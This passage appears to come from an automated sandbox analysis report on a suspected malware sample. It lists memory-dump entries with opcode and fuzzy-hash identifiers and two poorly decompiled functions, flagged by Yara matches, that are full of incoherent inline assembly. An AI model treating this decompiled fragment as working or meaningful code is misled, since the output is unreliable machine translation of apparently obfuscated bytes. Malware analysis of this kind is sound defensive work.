            • Instruction Fuzzy Hash: 02210831A09BC49BE722976C8D08F387795AF417B4F290761FA209B6E2DB6C9C40C711
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
            • Instruction ID: 798eb5a978b68097ff0a260430931eec7dd24ca4a69ff1daeb61707d6b8616b8
            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
            • Instruction Fuzzy Hash: A7213476204600AFC705DF18C880FABBBA9EFC4350F048629F8948B382DB30ED59CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ccc154b0bf2f0126d9a6e4b42a2e02be5531a10d9cc7190a2fc84336fc34cdaf
            • Instruction ID: 13d58482c321d840c3cef06f8d4028656b83509389d771fd1a84d8dac9268cb8
            • Opcode Fuzzy Hash: ccc154b0bf2f0126d9a6e4b42a2e02be5531a10d9cc7190a2fc84336fc34cdaf
            • Instruction Fuzzy Hash: DE21E4716442540FD704CB2AC8A09B6BFE5EFCB22638E81E6E8C8CF343C5249816C7A4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3adb1a72c8860d3c60a649d0e6b7caf0f97180d090ec343c020b09ac423346fc
            • Instruction ID: 6c37e55c50f03704e3d7cc9f5db7b6b7efa9fd8313a7b7a254af489cb02d30de
            • Opcode Fuzzy Hash: 3adb1a72c8860d3c60a649d0e6b7caf0f97180d090ec343c020b09ac423346fc
            • Instruction Fuzzy Hash: 50113339905604EBCB21AF29C580BBABBF5EF54710F25062AE94693380EA35DD41D790
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4dc56aea8da0cbf356753a1e925bcee7453411bf06c3a1947ed95dc8943e288f
            • Instruction ID: 67df771a6d3cbc50225a70973a1e7e6db9b8bea11dd89bb3db502125f6f3a0c5
            • Opcode Fuzzy Hash: 4dc56aea8da0cbf356753a1e925bcee7453411bf06c3a1947ed95dc8943e288f
            • Instruction Fuzzy Hash: D4219F72914604ABC725DF69D984E6BB7B8EF48740F100569F90AC7650E634ED00CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
            • Instruction ID: a2391eff4cd21b14a4b907bfc9135ffa9b981742926063062cd69f1b6d94f968
            • Opcode Fuzzy Hash: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
            • Instruction Fuzzy Hash: B321D5343016469BCB289FA9C4846F3B7E5EFA5304F54811AD4D5C7641D720BC86DBD2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bd174f7a2731597773ac2d6efd38ac536b229a79c9b1ba0e0d7cff98f4dbdb0e
            • Instruction ID: 6ee2e8cc21c4d1359e3784bba919062d65e3c11d76dcfd0b626b00a3365b1905
            • Opcode Fuzzy Hash: bd174f7a2731597773ac2d6efd38ac536b229a79c9b1ba0e0d7cff98f4dbdb0e
            • Instruction Fuzzy Hash: FF21A233A104169B9B18CF7DC8055A6F7E6EF9C31032A467BD812DB265EA70BD12C780
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 37527cf3eb25ade65d622f20ccdd91ad303ae4a54bb64dfc0495212d1a2f266d
            • Instruction ID: 297049811dd5f56fbcda6cde7f75235d92d6886985e8ddf0315d5fba34e9e9e8
            • Opcode Fuzzy Hash: 37527cf3eb25ade65d622f20ccdd91ad303ae4a54bb64dfc0495212d1a2f266d
            • Instruction Fuzzy Hash: 2A11E272600648AFD7229F95DD41FAAB7BCEB84750F204029FA058F540E671EE44DB54
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 897cdbece78774c229a5c94905e530fdc9e4a8a89c2701f9de2118f3efad95d5
            • Instruction ID: 84a6eea4b71fa296ecb33977567b47e1414548a534660f5e970c14a2351f5b3f
            • Opcode Fuzzy Hash: 897cdbece78774c229a5c94905e530fdc9e4a8a89c2701f9de2118f3efad95d5
            • Instruction Fuzzy Hash: E8213B716046009FD764DF69D981BAAB3F9FB44750F10846DE6AACB651DA30AC80DB50
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
            • Instruction ID: f2c8a40b4d632eeb8ae56cb70c6adb0822031a58255be7f825be4531fb7fada7
            • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
            • Instruction Fuzzy Hash: B2217F76E00119DBCB14CFA9C580A9AF3F9FB8C350FA64565E959B7354CA30AE05CBD0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 316fdd8ab789d9f6a8abad3e85fbd569021f9e277596b729c4b5cc75f9f2f568
            • Instruction ID: 077b9c2d6e129ac8367dc0693acc4774fe271345dd5b6d31751f18ef94a2458f
            • Opcode Fuzzy Hash: 316fdd8ab789d9f6a8abad3e85fbd569021f9e277596b729c4b5cc75f9f2f568
            • Instruction Fuzzy Hash: E3215472141A41EFC722EF68DE01F5AB7B9FF08704F0445A9F00A866A3CB38E952CB44
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cfe46905c3324b479fdbed01372d200d6f02f6eb47e4cf83913590612acd2632
            • Instruction ID: a35f5e437f90804303171fe0a31c31ebca6233cd3b02e7be68c16479e5c290d7
            • Opcode Fuzzy Hash: cfe46905c3324b479fdbed01372d200d6f02f6eb47e4cf83913590612acd2632
            • Instruction Fuzzy Hash: 2211AB333151109BCB189B159E81A6B7366FBD5370B34013AED26CB780CE31AC02C290
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 34%
            			E0040E376(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edi, void* __esi) {
            				intOrPtr _t27;
            				signed int _t30;
            				signed int _t31;
            				intOrPtr _t33;
            				signed int _t34;
            				signed int* _t39;
            				signed int _t41;
            				signed int _t48;
            
            				_t35 = __edi;
            				_t30 = __ecx;
            				asm("clc");
            				_t39 = __esi + 1;
            				_t32 = 0;
            				_push(0);
            				asm("cli");
            				asm("adc al, [edx]");
            				_t27 = __eax;
            				asm("cmc");
            				asm("out 0xc, eax");
            				asm("aam 0xd9");
            				_t2 = __ecx + 0x17;
            				 *_t2 =  *((intOrPtr*)(__ecx + 0x17)) + _t41;
            				asm("in eax, 0xc3");
            				asm("outsd");
            				asm("enter 0xc8d6, 0xb1");
            				if( *_t2 <= 0) {
            					_t32 = __edi;
            					_pop(_t35);
            					 *((intOrPtr*)(__ecx + 0x6219fda1)) =  *((intOrPtr*)(__ecx + 0x6219fda1)) - _t41;
            				}
            				_t33 = _t32;
            				asm("out 0x8b, eax");
            				_push(_t27);
            				asm("fldcw word [ebx]");
            				_t31 = _t30 |  *_t39;
            				_t48 = _t31;
            				 *((intOrPtr*)(_t33 + _t35 * 4 - 0x2a)) = _t27;
            				asm("repne jo 0xffffffbc");
            				_t14 = _t39 - 0x5fa8129a;
            				_t34 =  *_t14;
            				 *_t14 = _t33;
            				do {
            					_push(_t35);
            					asm("wait");
            					asm("outsd");
            					 *_t31 = _t31;
            				} while (_t48 >= 0);
            				_push(ss);
            				_push(0x83cd40);
            				 *((intOrPtr*)(_t34 - 0x2b281c25)) = cs;
            				asm("btc [eax-0x47ec54d3], ebx");
            				asm("salc");
            				asm("fldl2e");
            				asm("pushad");
            				 *0xa8e47485 =  *0xa8e47485 << 1;
            				return _t41 & _t34;
            			}











            0x0040e376
            0x0040e376
            0x0040e376
            0x0040e377
            0x0040e3df
            0x0040e3e1
            0x0040e3e2
            0x0040e3e3
            0x0040e3e5
            0x0040e3e6
            0x0040e3e7
            0x0040e3e9
            0x0040e3eb
            0x0040e3eb
            0x0040e3ee
            0x0040e3f0
            0x0040e3f1
            0x0040e3f5
            0x0040e3f8
            0x0040e3f9
            0x0040e3fa
            0x0040e401
            0x0040e404
            0x0040e406
            0x0040e408
            0x0040e409
            0x0040e40b
            0x0040e40b
            0x0040e40d
            0x0040e411
            0x0040e414
            0x0040e414
            0x0040e414
            0x0040e418
            0x0040e418
            0x0040e41e
            0x0040e41f
            0x0040e420
            0x0040e420
            0x0040e424
            0x0040e425
            0x0040e42a
            0x0040e432
            0x0040e43b
            0x0040e43d
            0x0040e43f
            0x0040e440
            0x0040e450

            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 936446da7390a81d2846c86c1ac54fd6819d49e08dd5987401106c301d368d17
            • Instruction ID: 3ba64b5b609e00d1033b2a0d983d933db273c4b7bb8347707fdd36fd9b13afe3
            • Opcode Fuzzy Hash: 936446da7390a81d2846c86c1ac54fd6819d49e08dd5987401106c301d368d17
            • Instruction Fuzzy Hash: 8E118C297892A59FD702DF7694C04B2FF60FBCB21470818BEE8419B183C271C116C7EA
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d4aeeff4ef93e10868052b9739ddbb58bbde280f33870a99f1aaca30df05f52d
            • Instruction ID: bd211a0b7b7cde1483382b2f860b2c6ffd6ece1dca1bc1f6b7a0c210886721d0
            • Opcode Fuzzy Hash: d4aeeff4ef93e10868052b9739ddbb58bbde280f33870a99f1aaca30df05f52d
            • Instruction Fuzzy Hash: 7F11D331A14344EFDB25CB61C908F66B7B9EB85354F2485ADE4018B240EB75AD02CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 88eb675a2d07d860c34ed7a04f49170f7137126a717f5eafe197a831efb95e64
            • Instruction ID: c85e2cebef7e7d28db54b46cb17db8b7efec0b72eb33020d272e8d5fa7eb9c7b
            • Opcode Fuzzy Hash: 88eb675a2d07d860c34ed7a04f49170f7137126a717f5eafe197a831efb95e64
            • Instruction Fuzzy Hash: F9213E74502B02CFC716EFA5D900A54B7F1FB89315F60C26BE11A8B262DB35D852CF81
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c8364d7d42556e4ddea115bdccf8719b8ae764299ef53f42504df9d7231ad197
            • Instruction ID: ddc3e41aacee4cf7b862bf9b9a28fc8346de931989050971bf498d526bde0294
            • Opcode Fuzzy Hash: c8364d7d42556e4ddea115bdccf8719b8ae764299ef53f42504df9d7231ad197
            • Instruction Fuzzy Hash: 271126717003106BE330E72AAD81F95B3D9EB90760F14443BF607AB292CAB8E8918754
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
            • Instruction ID: 055fc18ce28ec745e9f47886bfaf56e5f76fee1d817bc385d1e0f082fe4bcfe2
            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
            • Instruction Fuzzy Hash: 5E11E572904208BFC7059F5CE9818BEB7B9EF99300F10806AF944CB351DA319D55D7A4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 096ed5631bc71e6652968f411a864ed6a3770d911898537059c687c78b3ca85c
            • Instruction ID: 9685373df3a2a001075eae8cfe084a517b3de2d96541af159130a58208659f35
            • Opcode Fuzzy Hash: 096ed5631bc71e6652968f411a864ed6a3770d911898537059c687c78b3ca85c
            • Instruction Fuzzy Hash: 67110A7B912541DAC325DFEAED41B2133B4FB84B51B544026E506DB371DB39DC42D320
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5f771ac7cc95d7278d7b3647adffc9396abea73ef5b15962616cfddc27f5fa41
            • Instruction ID: 89173ab09cbd77e7cf138f8d983630ef92d5ae9c42d0b86fd9557edc19c76373
            • Opcode Fuzzy Hash: 5f771ac7cc95d7278d7b3647adffc9396abea73ef5b15962616cfddc27f5fa41
            • Instruction Fuzzy Hash: 76114E3974C684ABE3215369CE45F3A379CDFC0B50F240465BA019B3D1DAE4DC40C321
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bf37cc1569d245523ca11e6024e82bcb8f8731cad259b625c7f8b6f0f9b848df
            • Instruction ID: 1125e0ec33f664b80c98518e9fa07bd6568868bb08bebf334d2bb4c401f08158
            • Opcode Fuzzy Hash: bf37cc1569d245523ca11e6024e82bcb8f8731cad259b625c7f8b6f0f9b848df
            • Instruction Fuzzy Hash: D201C8739056205BC7278B5EB940A267BA6DF86B50B15407AF9458F315D738DD01CB80
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3a8e361a9925bfddff79d218e6c60a153bc4442263f8595a62bed8cd79710b3a
            • Instruction ID: d0f54fd0815b40d8fd08e29166c1366678c3e0e616c73708a2b0b8d86bd3df51
            • Opcode Fuzzy Hash: 3a8e361a9925bfddff79d218e6c60a153bc4442263f8595a62bed8cd79710b3a
            • Instruction Fuzzy Hash: 6311AC34A01205DBCB64DF95C581AEFB7B9BF44710B10855DE5066B263CB35AC41CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
            • Instruction ID: 64ab37b06fb5fdd8107e0f9003007ea7bd4942f7e2ff72854f7b9ff79373b276
            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
            • Instruction Fuzzy Hash: E3112232A066808FD7229B28DA44F7937E5FF49759F1A00B0ED048B692E378DCC1C660
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7dc71580c17b6d6ae8da11455a0f2d8d99ecefe3d67d8275f497445e749cf934
            • Instruction ID: bcfea528695d3549ac8a9dbcd48185e3064c469a25f6e410d9e2121a116c052e
            • Opcode Fuzzy Hash: 7dc71580c17b6d6ae8da11455a0f2d8d99ecefe3d67d8275f497445e749cf934
            • Instruction Fuzzy Hash: 150196726012059BC310EB69ED41B69B7A8EB85325B14466BF5058B292DE39DC41C7D1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 33%
            			E0040E3C8(signed int __eax, void* __ebx, signed int __ecx, signed int __edi, signed int* __esi) {
            				signed int _t19;
            				signed int _t28;
            				signed int _t31;
            				signed int _t32;
            				intOrPtr _t34;
            				signed int _t35;
            				signed int* _t39;
            				signed int _t41;
            				signed int _t49;
            
            				_t39 = __esi;
            				_t36 = __edi;
            				_t31 = __ecx;
            				asm("lock mov al, 0x9a");
            				asm("sbb eax, 0x53e7a28f");
            				asm("sbb al, 0xbb");
            				_push(ds);
            				 *[cs:esp+edi*4+0x734f434c] =  *[cs:esp+edi*4+0x734f434c] + __ebx;
            				_t19 = __eax | 0xd23012bd;
            				_t33 = 0;
            				_push(0);
            				asm("cli");
            				asm("adc al, [edx]");
            				_t28 = _t19;
            				asm("cmc");
            				asm("out 0xc, eax");
            				asm("aam 0xd9");
            				_t2 = __ecx + 0x17;
            				 *_t2 =  *((intOrPtr*)(__ecx + 0x17)) + _t41;
            				asm("in eax, 0xc3");
            				asm("outsd");
            				asm("enter 0xc8d6, 0xb1");
            				if( *_t2 <= 0) {
            					_t33 = __edi;
            					_pop(_t36);
            					 *((intOrPtr*)(__ecx + 0x6219fda1)) =  *((intOrPtr*)(__ecx + 0x6219fda1)) - _t41;
            				}
            				_t34 = _t33;
            				asm("out 0x8b, eax");
            				_push(_t28);
            				asm("fldcw word [ebx]");
            				_t32 = _t31 |  *_t39;
            				_t49 = _t32;
            				 *((intOrPtr*)(_t34 + _t36 * 4 - 0x2a)) = _t28;
            				asm("repne jo 0xffffffbc");
            				_t14 = _t39 - 0x5fa8129a;
            				_t35 =  *_t14;
            				 *_t14 = _t34;
            				do {
            					_push(_t36);
            					asm("wait");
            					asm("outsd");
            					 *_t32 = _t32;
            				} while (_t49 >= 0);
            				_push(ss);
            				_push(0x83cd40);
            				 *((intOrPtr*)(_t35 - 0x2b281c25)) = cs;
            				asm("btc [eax-0x47ec54d3], ebx");
            				asm("salc");
            				asm("fldl2e");
            				asm("pushad");
            				 *0xa8e47485 =  *0xa8e47485 << 1;
            				return _t41 & _t35;
            			}












            0x0040e3c8
            0x0040e3c8
            0x0040e3c8
            0x0040e3c8
            0x0040e3cb
            0x0040e3d0
            0x0040e3d2
            0x0040e3d3
            0x0040e3db
            0x0040e3df
            0x0040e3e1
            0x0040e3e2
            0x0040e3e3
            0x0040e3e5
            0x0040e3e6
            0x0040e3e7
            0x0040e3e9
            0x0040e3eb
            0x0040e3eb
            0x0040e3ee
            0x0040e3f0
            0x0040e3f1
            0x0040e3f5
            0x0040e3f8
            0x0040e3f9
            0x0040e3fa
            0x0040e401
            0x0040e404
            0x0040e406
            0x0040e408
            0x0040e409
            0x0040e40b
            0x0040e40b
            0x0040e40d
            0x0040e411
            0x0040e414
            0x0040e414
            0x0040e414
            0x0040e418
            0x0040e418
            0x0040e41e
            0x0040e41f
            0x0040e420
            0x0040e420
            0x0040e424
            0x0040e425
            0x0040e42a
            0x0040e432
            0x0040e43b
            0x0040e43d
            0x0040e43f
            0x0040e440
            0x0040e450

            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e35ba94e86a6312a99f4b649f47882223bb8e642d57ae956a617a41c4f50201f
            • Instruction ID: 7b714f22e6174e9c26fab04a3b6b5fd4b4a3b83b3b4f746b8545bc1366bf898f
            • Opcode Fuzzy Hash: e35ba94e86a6312a99f4b649f47882223bb8e642d57ae956a617a41c4f50201f
            • Instruction Fuzzy Hash: 94016D367482665FDB11CE7698808B3FB50FB8B2217181DBEE4419B083D332C102C7A9
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2838a12bfa7fb0c301611d14f3f4a56a391a4934558db612db6c0909e9ac3aae
            • Instruction ID: 1f96d8d5d331e98e7772e97fbce016bc98fdaed89ea644881dea36bf2db501da
            • Opcode Fuzzy Hash: 2838a12bfa7fb0c301611d14f3f4a56a391a4934558db612db6c0909e9ac3aae
            • Instruction Fuzzy Hash: E5110872505B519BCB228F569840923BBE8FF55B60720892DF8998B680DB35DD00DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
            • Instruction ID: f5ffd4000c385b8a0e93024e70c026385fc86d0685d0f8c7b6e855e3a8706403
            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
            • Instruction Fuzzy Hash: 7201847270591DAFC7209E9ECD41EABF7ADFB84760F240534BA18CB290DA30DD0187A1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1e67d10eeb10cf4e22d10062f95e57198fd5e80c70676590c4983b591a43b700
            • Instruction ID: 32800d89c7befea1bfa03784ceba0d81baba90369c8eb3fe3db4acdac25c5537
            • Opcode Fuzzy Hash: 1e67d10eeb10cf4e22d10062f95e57198fd5e80c70676590c4983b591a43b700
            • Instruction Fuzzy Hash: B901C272A026449FC72A9F19DC40B22BBB9EF85322F254077E6068F7A1C774DC81CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
            • Instruction ID: 4bd16abeda45b9d3d8ded51efa78e946db73dd61b708b156a3a540e42e27af80
            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
            • Instruction Fuzzy Hash: 4F019E72240519BFD722AF69DD95E63F76DFF547A1F008529F218425A1CB32ECA0CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e1032898b8891687a2c90b812be377905a11c3bfd751bac193b5d10c6b5d13aa
            • Instruction ID: 653927c8211d9ba7ec2bbe36342a075cd0b018aa8c97518b266849c996379254
            • Opcode Fuzzy Hash: e1032898b8891687a2c90b812be377905a11c3bfd751bac193b5d10c6b5d13aa
            • Instruction Fuzzy Hash: AD012872101684EBC3229AA2CC40F67779DEF817A0F114139F62A4B381CF30DC02C790
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 64596e8254a92f6296e589887ec529f33fd48c22f534e48f3f2e35a25ff74cd5
            • Instruction ID: 34b3271c48b14e0b3ea6b3e75db7b2caebfaa4c6f59f3fd07f1e685b22ed4aa6
            • Opcode Fuzzy Hash: 64596e8254a92f6296e589887ec529f33fd48c22f534e48f3f2e35a25ff74cd5
            • Instruction Fuzzy Hash: 8B0184726016497FC211AB69CE85F67B7ACFF89760B000225B60883A53CB34EC11C7E4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cd41840913fde36b44aca51169ed52aaca1c3c379bf37e85e3a76e03a02823ec
            • Instruction ID: 5282685e65babca1534a0b7792286d6041da801dd340f1d59f378848fb8bcb2a
            • Opcode Fuzzy Hash: cd41840913fde36b44aca51169ed52aaca1c3c379bf37e85e3a76e03a02823ec
            • Instruction Fuzzy Hash: 0E01B132600744AFDB23D767D904AA777EDEFC1750F248829BA968B651DA34ED01CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 06d75836c9573aa0e55f1f59fba811012c8e74f5e68e5d7ca759bd447d74ee88
            • Instruction ID: 34cec4ca2d1021cb0c4155f441d1fb48f8e6c7a9c3e328f561c48507eb004620
            • Opcode Fuzzy Hash: 06d75836c9573aa0e55f1f59fba811012c8e74f5e68e5d7ca759bd447d74ee88
            • Instruction Fuzzy Hash: 6C11A932518B42DFDB329F56D980B22B7E5FF50722F19C868E4894A5A2C778EC80CB10
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bf598e566b35e1d20a70125267074cd08fac0cc1b339f732a1dfe38789a01d6f
            • Instruction ID: 0d2013e84b587169ae036db5e21aa4c6f189de50a7d5ea20c9aad8a5400bfbc9
            • Opcode Fuzzy Hash: bf598e566b35e1d20a70125267074cd08fac0cc1b339f732a1dfe38789a01d6f
            • Instruction Fuzzy Hash: 1F118EB1A093089FC700DF69D94295BBBF4EF88710F00852EF998D7391E670E900CB92
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: db0e525be444535a91db29c7afdbee1a2d3a583ca138fe98bd0bc82f852adea8
            • Instruction ID: 4d7982b70c34b5eae297190a70d36cd615fa355f270cc26c36c04d02b9223d93
            • Opcode Fuzzy Hash: db0e525be444535a91db29c7afdbee1a2d3a583ca138fe98bd0bc82f852adea8
            • Instruction Fuzzy Hash: A2015E71E01218AFCB14DFA9D942EAEBBB8EF45710F004066F905EB281EB749A01CB95
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e65839f8af6012f4ca7b351b82204a18ad41a8bdbc16b7971588f58bdfe1c4d1
            • Instruction ID: 3a02bdaff7b8ae27eb5cf0dbeca96d45eb6e7ff2670c9514781f68692140df0d
            • Opcode Fuzzy Hash: e65839f8af6012f4ca7b351b82204a18ad41a8bdbc16b7971588f58bdfe1c4d1
            • Instruction Fuzzy Hash: BA019E71E01258AFCB10DFA8D942EAEBBB8EF45710F00406AF915EB281DA70DA01CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fab0c485f60ad926169880dc8cf1c2acbb4a6bb70ced4fcaa2074de596fe31cb
            • Instruction ID: 380ef83ca5fef8c92140099445e9bea45aaaa1820831be7993f28c2f8f21a1fb
